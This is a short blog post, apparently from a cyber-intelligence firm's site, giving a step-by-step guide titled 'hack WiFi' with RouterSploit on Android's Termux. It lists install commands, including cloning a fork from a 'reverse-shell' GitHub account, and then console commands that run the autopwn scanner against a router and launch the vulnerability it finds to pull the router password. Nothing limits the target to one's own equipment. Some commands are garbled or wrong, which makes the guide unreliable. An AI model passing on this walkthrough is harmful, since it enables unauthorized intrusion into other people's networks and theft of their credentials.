HACK WIFI USING ROUTERSPLOIT IN TERMUX

Read Time:1 Minute, 5 Second

HOW TO DOWNLOAD AND INSTALL ROUTERSPLOIT ON TERMUX?


After successfully download and install Termux give these following commands

$ pkg update && pkg upgrade

$ pkg install python -y

$ pkg install python2 -y
[Here python2 have no any work but when you download and install routersploit you get many errors. So solve many errors problem you can download python2]

$ pkg install git

$ pkg install pip

$ git clone https://github.com/reverse-shell/routersploit
[ Copy this link 👉 https://github.com/reverse-shell/routersploit ]

$ ls

$ cd routersploit

$ pip2 install -r requirement.txt

$ pip2 install requests
[ It will be taken few minutes for install. Don’t skip it ]

$ pip install future

$ python rsf.py
[ Then routersploit tool is install successfully]

Now your routersploit tool is ready for use.

rsf > show all

rsf > use scanners/autopwn

rsf > show options

rsf > set target { your ip}
[ For get ip, go to settings>wifi
Then copy ip of router which you want to use]

rsf > set http_port 80 vulnerability

rsf > run
Now you vulnerability process get start. This process take few minutes to scan Vulnerability to this router. After scan Vulnerability you can copy this password which interface is like [+]Then give commands

rsf > use {your vulnerability text }

rsf > set target {router IP }

rsf > run

About Post Author

Treadstone 71

@Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %

Author

  • @Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence

Previous post Direct Threats – #Manar #Zeinab #Iranian President – #IRGC #Trump
Next post Black Sea Fleet in Sevastopol
%d bloggers like this: